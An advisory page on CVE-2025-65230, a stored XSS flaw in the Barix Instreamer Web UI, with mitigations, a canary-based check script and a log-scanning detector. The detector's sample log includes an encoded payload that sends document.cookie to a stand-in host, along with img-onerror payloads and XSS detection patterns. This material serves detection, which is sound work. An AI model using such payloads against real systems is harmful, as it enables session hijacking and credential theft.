CVE-2025-65230

5.4 MEDIUM

📋 TL;DR

Barix Instreamer versions 04.06 and 04.05 contain a stored cross-site scripting (XSS) vulnerability in the Web UI's Streaming Destination configuration input. A user who can edit that field can store script markup in the device configuration; it executes in the browser of any administrator who later views the configuration page, with that administrator's session. Exploitation needs access to the configuration interface, so the exposure is any device on these versions whose Web UI is reachable by someone other than its trusted administrators.

💻 Affected Systems

Products:
  • Barix Instreamer
Versions: v04.06 and v04.05
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in the Web UI configuration interface for streaming destinations.

📦 What is this software?

Barix Instreamer is a network audio encoder: it takes a local audio input, encodes it and pushes the stream to the network destination configured as the Streaming Destination. That setting, like the rest of the device configuration, is managed through the embedded Web UI on the device, which is where this vulnerability sits.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker who can set the Streaming Destination can hijack an administrator's session (read the session cookie if it is not marked HttpOnly, or drive the Web UI from the victim's browser), change any setting the administrator can, including the streaming destination and credentials, and use the administrator's browser as a pivot against other systems on the management network.

🟠

Likely Case

An attacker who already has credentials for the configuration interface (a shared or leaked password, or a less trusted user with configuration rights) stores a script in the Streaming Destination field; when an administrator views the page it runs with the administrator's session and can steal credentials or perform actions on the administrator's behalf.

🟢

If Mitigated

With server-side validation of the field (host name, IP address or URL only) and HTML encoding of the stored value when it is rendered back into the page, the injected markup is displayed as text rather than executed, so there is nothing for the administrator's browser to run.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access to the configuration interface. A public proof-of-concept is available in a GitHub repository.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Documentation (user manual, not a dedicated security advisory): https://help.barix.com/instreamer/user-manual

Restart Required: No

Instructions:

Check the vendor's support site for a firmware release that addresses this issue. If one is available, download it and apply it according to the vendor's instructions, then re-test the Streaming Destination field (see How to Verify) rather than relying on the version number alone.

🔧 Temporary Workarounds

Input Validation Filter

Applies to: all

Server-side validation of the Streaming Destination field (accept only a host name, IP address or URL) plus HTML encoding of the stored value when it is written back into the page.

Not applicable as an operator workaround: this is a change to the device firmware that only the vendor can make. Output encoding at render time is the actual fix for stored XSS; input validation on its own is defence in depth.

Content Security Policy

Applies to: all

A strict Content-Security-Policy header on Web UI responses makes the browser refuse the injected inline script even though it is present in the page:

Content-Security-Policy: default-src 'self'

Caveat: the header has to be sent with the device's responses, and operators cannot change the firmware, so in practice this means a reverse proxy in front of the Web UI that adds the header. A policy without 'unsafe-inline' also blocks any inline scripts and event handlers the UI itself relies on, so exercise the configuration pages through the proxy before depending on it. It does not remove a stored payload; it only stops CSP-enforcing browsers from running it.

🧯 If You Can't Patch

  • Restrict access to the Web UI configuration interface to trusted administrators only, and give each administrator an individual account with a unique password: the payload has to be stored by someone who can edit the Streaming Destination field, so limiting and auditing that group limits the attack
  • Implement network segmentation to isolate Barix Instreamer devices from untrusted networks; the management interface should not be reachable from the Internet or from general user VLANs
  • Review the current Streaming Destination value on every device: it should be a host name, IP address or URL and nothing else; treat angle brackets, quotes or "javascript:" in it as an indicator of compromise

🔍 How to Verify

Check if Vulnerable:

Confirm the device runs Barix Instreamer v04.06 or v04.05. To test directly, save a harmless marker such as "><xss-canary></xss-canary> (not a live script payload) into the Streaming Destination field, reload the configuration page, and look at the page source: if the marker comes back as raw markup rather than HTML-encoded (&lt;xss-canary&gt;), the field is rendered without output encoding and the device is vulnerable. Restore the real destination afterwards.

Check Version:

Read the firmware version from the Web UI or the device management console.

Verify Fix Applied:

Confirm the installed version is the one the vendor names as fixed, then repeat the marker test above: the marker must come back HTML-encoded or be rejected on save.
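The marker test above, as an added example (not code from this page or from Barix): a small Python script that classifies how the saved canary comes back in the page source. It works on HTML you have already saved from the device, because the page does not document the device's login or form endpoints; the sample pages and the input name `dest` are constructed for illustration, not taken from real firmware.

```python
import html
import re
import sys

# Harmless canary: a custom element name that browsers neither execute nor
# render, and that no legitimate stream host or URL contains.  The leading
# quote and angle bracket test a break-out from a quoted attribute value,
# which is where a form field's saved value normally lands.
CANARY = '"><xss-canary></xss-canary>'

# Entity- or percent-encoded forms of the canary's '<', which is what fixed
# firmware should emit when it writes the stored value back into the page.
ENCODED_TAG = re.compile(r"(&(lt|#0*60|#x0*3c);|%3c)xss-canary", re.IGNORECASE)
RAW_TAG = re.compile(r"<xss-canary", re.IGNORECASE)


def classify_reflection(page_html: str) -> str:
    """Classify how the saved canary comes back in the configuration page.

    'unescaped' : quote and angle brackets all reflected raw; the value breaks
                  out of its attribute and opens a tag (vulnerable)
    'partial'   : a raw '<xss-canary' is present but not the full break-out
                  sequence (e.g. the quote was encoded); inspect the context
    'escaped'   : only an encoded form is present (output encoding in place)
    'absent'    : canary not found (wrong page, save rejected, or not saved)
    """
    if CANARY in page_html:
        return "unescaped"
    if RAW_TAG.search(page_html):
        return "partial"
    if ENCODED_TAG.search(page_html):
        return "escaped"
    return "absent"


# Constructed sample responses (not captured from a real device): roughly what
# the Streaming Destination row of the settings page might look like before
# and after a fix.  The input name 'dest' is an assumption.
VULNERABLE_SAMPLE = (
    '<tr><td>Streaming Destination</td>'
    '<td><input type="text" name="dest" value="' + CANARY + '"></td></tr>'
)
FIXED_SAMPLE = (
    '<tr><td>Streaming Destination</td>'
    '<td><input type="text" name="dest" value="'
    + html.escape(CANARY, quote=True) + '"></td></tr>'
)


def main(argv):
    # Usage: python check_reflection.py saved_page.html
    # Save the canary into the Streaming Destination field through the Web UI,
    # then save the configuration page's source and pass the file here.
    if len(argv) == 2:
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            verdict = classify_reflection(fh.read())
    else:
        verdict = classify_reflection(VULNERABLE_SAMPLE)
    print(verdict)
    return verdict


if __name__ == "__main__":
    main(sys.argv)
```

Only "unescaped" is a confirmed finding; "partial" means the quote was encoded but the angle brackets were not, which is inert inside a quoted attribute and live in a text node, so look at where the value lands before drawing a conclusion.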

📡 Detection & Monitoring

Log Indicators:

  • Angle brackets, quotes, "<script", "javascript:" or "on...=" event-handler attributes in the value of the Streaming Destination field, whether seen in the device configuration, in a configuration backup, or in the request logs of a proxy in front of the Web UI (if the device exposes no request log, a proxy or packet capture in front of it is where the request body is visible)
  • Multiple failed login attempts to the Web UI, followed by a successful login and a configuration change
  • Configuration changes, especially to the streaming destination, from an account or at a time that no administrator recognises

Network Indicators:

  • POST requests to the configuration endpoints carrying percent-encoded script markup (%3Cscript, %3Cimg, onerror%3D) or the same in mixed case
  • Administrator browsers connecting to unfamiliar hosts immediately after loading the device configuration page (a stolen session or credential leaves from the victim's browser, not from the device)
  • The device streaming to a destination that does not match its documented configuration, since a payload running as the administrator can change that setting

SIEM Query:

Splunk-style, to run over whichever log records requests to the configuration endpoints (a reverse proxy or web server in front of the device). A literal match misses percent-encoded, entity-encoded or mixed-case payloads unless the field is decoded at ingestion, so include the encoded forms:

source="barix_instreamer" AND (message="*<script*" OR message="*%3Cscript*" OR message="*javascript:*" OR message="*onerror=*" OR message="*onload=*")
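An added example (not from this page or from the vendor) of the detection logic the query above only approximates: a literal match on `<script>` misses percent-encoded, entity-encoded, double-encoded and mixed-case payloads. The script below normalizes each POSTed field before matching and runs over constructed sample proxy log lines; the log format, the `/config/stream` path and the `dest` field name are assumptions for illustration, not the device's real endpoint.

```python
import html
import re
import urllib.parse

# Constructed sample lines (not real device or proxy output).  Assumed format,
# as a reverse proxy in front of the Web UI could be configured to log it:
#   <timestamp> <client-ip> <method> <path> <form-body or '-'>
# The path /config/stream and the field name 'dest' are placeholders for the
# real Streaming Destination endpoint and parameter.
SAMPLE_LOG = """\
2025-11-03T09:12:41Z 10.0.5.21 POST /config/stream dest=icecast.example.net:8000/live&name=Lobby
2025-11-03T09:14:02Z 10.0.5.77 POST /config/stream dest=%22%3E%3Cscript%3Efetch('http://10.0.9.9/?c='%2Bdocument.cookie)%3C/script%3E&name=Lobby
2025-11-03T09:15:10Z 10.0.5.77 POST /config/stream dest=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E&name=Lobby
2025-11-03T09:16:30Z 10.0.5.21 GET /config/stream -
2025-11-03T09:17:05Z 10.0.5.77 POST /config/stream dest=x%26%2334%3B%3E%26lt%3BsCrIpT%26gt%3B&name=Ops
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<body>.*)$"
)

# Matched against the normalized value, so case and encoding tricks are gone.
# The event-handler pattern needs at least three letters after 'on' to avoid
# firing on short field names such as 'one='; it can still match e.g. 'only='.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b"),
    re.compile(r"javascript\s*:"),
    re.compile(r"<\s*(img|svg|iframe|object|embed|body|math)\b"),
    re.compile(r"\bon[a-z]{3,}\s*="),          # onerror=, onload=, onmouseover= ...
    re.compile(r"data\s*:\s*text/html"),
]


def normalize(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent- and HTML-entity encoding, then
    drop NUL bytes and lower-case, so that %3Cscript%3E, &lt;ScRiPt&gt; and
    double-encoded %253C all end up as the literal '<script'."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev = value
        value = html.unescape(urllib.parse.unquote_plus(value))
    return value.replace("\x00", "").lower()


def scan_line(line: str):
    """Return a hit dict if a POSTed form field contains script-like content,
    else None.  GET requests and empty bodies are ignored."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST" or m["body"] == "-":
        return None
    for field in m["body"].split("&"):   # split before decoding: an encoded & is data
        name, _, raw = field.partition("=")
        decoded = normalize(raw)
        for pat in XSS_PATTERNS:
            if pat.search(decoded):
                return {"ts": m["ts"], "client": m["client"], "path": m["path"],
                        "param": name, "pattern": pat.pattern, "decoded": decoded}
    return None


def scan_log(text: str) -> list:
    """Scan every line of a log and return the list of hits in order."""
    return [hit for hit in (scan_line(ln) for ln in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['client']} {hit['param']}={hit['decoded']!r}  [{hit['pattern']}]")
```

On the sample input the three requests from 10.0.5.77 are flagged and the legitimate Icecast destination from 10.0.5.21 is not; the same normalize-then-match step is what to put in the ingestion pipeline if the SIEM query is to stay a simple literal match.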
